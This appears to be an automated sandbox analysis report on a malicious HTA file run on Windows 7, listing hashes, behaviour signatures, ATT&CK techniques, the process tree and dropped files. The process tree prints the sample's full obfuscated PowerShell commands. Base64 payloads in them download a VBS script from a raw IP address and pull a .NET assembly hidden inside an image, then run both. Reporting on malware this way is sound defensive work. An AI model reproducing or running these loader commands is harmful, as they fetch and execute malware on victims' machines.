a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-01-2025 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wegivenbestthngsforbestgirlfriendwhobestforentiretime.hta
Size

15KB
MD5

b6bca63d34e72f931db79e9b7af61d21
SHA1

b9bb3c1c502d31bd3fdb1841d312c2fa5bab4caf
SHA256

a46ea1e4766c89b34c82354c215e4a27c11cb53886ace74f78af8655dfa09fab
SHA512

acce0debf2b8dfa9bc06c1c317cc3491d61c7ca48607c614a95674454bc3a5fb8a1f8d898bb40d517272643af63aae3e06cedd76432cf2c8da6ab905c0c0d6ea
SSDEEP

48:3hMuVfhMLVfu4TArxprC+cAZSnRyxm6SMkMMf2M2VfmMTG:heFTArxVncWSWSjAo

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2676	powershell.exe
6	2884	powershell.exe
8	2884	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2676	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2676	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 2808	1508	mshta.exe	31
PID 1508 wrote to memory of 2808	1508	mshta.exe	31
PID 1508 wrote to memory of 2808	1508	mshta.exe	31
PID 1508 wrote to memory of 2808	1508	mshta.exe	31
PID 2808 wrote to memory of 2676	2808	cmd.exe	33
PID 2808 wrote to memory of 2676	2808	cmd.exe	33
PID 2808 wrote to memory of 2676	2808	cmd.exe	33
PID 2808 wrote to memory of 2676	2808	cmd.exe	33
PID 2676 wrote to memory of 2732	2676	powershell.exe	34
PID 2676 wrote to memory of 2732	2676	powershell.exe	34
PID 2676 wrote to memory of 2732	2676	powershell.exe	34
PID 2676 wrote to memory of 2732	2676	powershell.exe	34
PID 2732 wrote to memory of 2576	2732	csc.exe	35
PID 2732 wrote to memory of 2576	2732	csc.exe	35
PID 2732 wrote to memory of 2576	2732	csc.exe	35
PID 2732 wrote to memory of 2576	2732	csc.exe	35
PID 2676 wrote to memory of 2056	2676	powershell.exe	37
PID 2676 wrote to memory of 2056	2676	powershell.exe	37
PID 2676 wrote to memory of 2056	2676	powershell.exe	37
PID 2676 wrote to memory of 2056	2676	powershell.exe	37
PID 2056 wrote to memory of 2884	2056	WScript.exe	38
PID 2056 wrote to memory of 2884	2056	WScript.exe	38
PID 2056 wrote to memory of 2884	2056	WScript.exe	38
PID 2056 wrote to memory of 2884	2056	WScript.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wegivenbestthngsforbestgirlfriendwhobestforentiretime.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWerShELl -EX BYpASS -nop -W 1 -C DEVIcecREdEntIAlDePloYment.eXE ; INVOKe-eXPRESSIoN($(INvoKe-eXpreSsION('[SYSTEM.TEXt.ENCODiNg]'+[chaR]58+[CHaR]0X3A+'UTf8.getSTRiNg([sysTEM.CONVErT]'+[CHaR]58+[CHaR]0x3a+'frOmBASE64STRING('+[CHaR]34+'JE5nZUdPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CZXJEZUZpTml0aU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpreUYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGU3hxSGZWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCQVMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJRaSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1BWICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROZ2VHT3U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNTUwL25pY2V3b3JraW5nc2tpbGxnaXZlbWViZXN0dGhpbmdzZm9yYm9vc3RiZXN0Zm9ybWVnaXZlbmJlc3RjaGFsbC5nSUYiLCIkRW5WOkFQUERBVEFcbmljZXdvcmtpbmdza2lsbGdpdmVtZWJlc3R0aGluZ3Nmb3Jib29zdGJlc3Rmb3JtZWdpdmVuYmVzdGMudmJzIiwwLDApO1NUQVJULVNsZWVQKDMpO0lOVk9LRS1lWFByZXNzSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNld29ya2luZ3NraWxsZ2l2ZW1lYmVzdHRoaW5nc2ZvcmJvb3N0YmVzdGZvcm1lZ2l2ZW5iZXN0Yy52YnMi'+[ChAr]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwianwvm.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2732
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE61C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE61B.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2576
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAZABvAG8AZwBwAHUAdAByAGEAdABzAHcAZQBuAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAeQBtAGUAZQBzAC8AMAA1ADUALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADcANgA5ADYAMQA3ADEALwBoAGUAawBlADIAcABtAHQAZQB1AHcAOABzAHEAcwBwAGwAaABrAGwALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabF817.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE61C.tmp

Filesize
1KB

MD5
669546877e0c501ef8662fce48ccccd6

SHA1
756543fcdc5799c627f1363a56dbad1f3aac5855

SHA256
1fdfcb1e416d933d45676ef91c147b1a5855377e22e593df2e23be899c4bd4de

SHA512
a683fef2a6f2f85f4b965be3a8e96709f1baed6607a814a4e8c11f0300f29ead3b5e6a4313c11710689001c58983cfbf0bcdb4d02dbfe4d5acb1c9c97c108e8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF829.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nwianwvm.dll

Filesize
3KB

MD5
58d98c83dbc21216d710d205d295e38b

SHA1
26d73b3132f7a96c9c5d72e26285ebb5c5a4eb46

SHA256
bc63e641a8358de976bf1081c065dcc55495b944412de246b2e678790c888302

SHA512
f92ac7d637f9a3456f8a2ca613ce379fbc6faa2d97aedc63f0ee0b0556cf074c92a4addb405505f104f5d1a2f6088e1795c8eec0f83d33be67ed94e19bb31498

Download Submit
C:\Users\Admin\AppData\Local\Temp\nwianwvm.pdb

Filesize
7KB

MD5
3fdf1b661dd0d4f1fc811a839206e44b

SHA1
1e15862d5c0f1cfa39e51ba3f81cbf854d10f3b4

SHA256
1357319645e1fd1ad58c34c23c375b224e4f16e6b1a547c1f16bd7b1b3bbd996

SHA512
eed0dcd3a567e357328940a2f4540fd68df5a7721cf3e469b5451e77e31b567a13c7ab19a305eedd734c087659284fe041139e5d0e85a20a234b1b4af348b101

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4Q37EICNCMZ947N33OO.temp

Filesize
7KB

MD5
2343f8ec60b9e49104424072d07f8a08

SHA1
39102e33055e466e0c5e464320586d9edfb9d316

SHA256
695f33b6d15e94ba5b6f13b0b4dd504f18a23dab96c391ff1323dca60ed703a8

SHA512
4e9556394304f5fbb4223aa371476453c8c8ea4e55dd0b81851df4c734d8ba71b5bb62c3d689ad32dab458b77e258dddbb246626532a468cbb820d3ad754c0e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2dbfd041662e68ec3f5c5247801491c2

SHA1
f029cb5c9912f77bd4b75e91042bd2e4cf40466d

SHA256
e316a82e4554173672048e18e128e528e0c46ae30c6f59a1013ab6b40f197419

SHA512
59e5607e211b952bbbfaa2a85351a409405be02c36ca733694f270fcc430cfa3a426c3d09503abfb862960cd58c0090125448be234abf7d3df28033f313255c1

Download Submit
C:\Users\Admin\AppData\Roaming\niceworkingskillgivemebestthingsforboostbestformegivenbestc.vbs

Filesize
223KB

MD5
0f3025d4d5a84125b6976beadc384ba6

SHA1
00f8ef347fac607094499a75102a0f330bd61ae1

SHA256
ecbd9b07289801b665dbd8822fe23248e816033fe5791f227f81b13f01645182

SHA512
3528872018fd7b511d93bfb0a82043c45b076b7bc197a1b66e42d76d775a032875640793494491f8c609aa6c0410c32f88fa0b2f339bd59ed166eed0c77cb211

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE61B.tmp

Filesize
652B

MD5
5eb75410da7190704248bcf436e284c4

SHA1
f0d1c7889eda7c2d808be91327ddc25f3defcfee

SHA256
7b81f2c1065c636e1960251f1a7245470509ef7c933fad996b4509bc86b8cb08

SHA512
92cca353db0d96af359a0b2da804f8ef25faa701d061609e7cf39ebeee57adcd748648bbaf8b79569173641f2f53005624731f499fa743d288acfde0495efa52

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nwianwvm.0.cs

Filesize
455B

MD5
d8cdd711e8e78d09c6cc1ab48e24dd50

SHA1
5cb77a53a82f93db5edd021d706f986dd504005a

SHA256
c2c29865844c4fea1dcecd5de4489dbb084ddda0720ecd40cf1bfc76f50c37f8

SHA512
66814498882b10126c2d5abdf4b223c4d37a2432b1d315dbcde5a65cb7f121f36be0a57a40467ab8b43f800f13a0dd7038002f09fa09e83183cde110296e4635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nwianwvm.cmdline

Filesize
309B

MD5
99ede239636f3e9c81d37aa0f6bc4c92

SHA1
9bc690db17284f5c8741e0ac51d3d2d605eddb8b

SHA256
0fcca21541b78cd9c5f2eac315032eaa7c01a8356960c934b8fa67cdef65d980

SHA512
d09d24acb59ccf5e00c99560af202f56444fb6096ea35f86d8c028384156445abb9d86efa8b1835353057a2c598b6bce0eabc41f5b17e9d57030f64d4b90dc86

Download Submit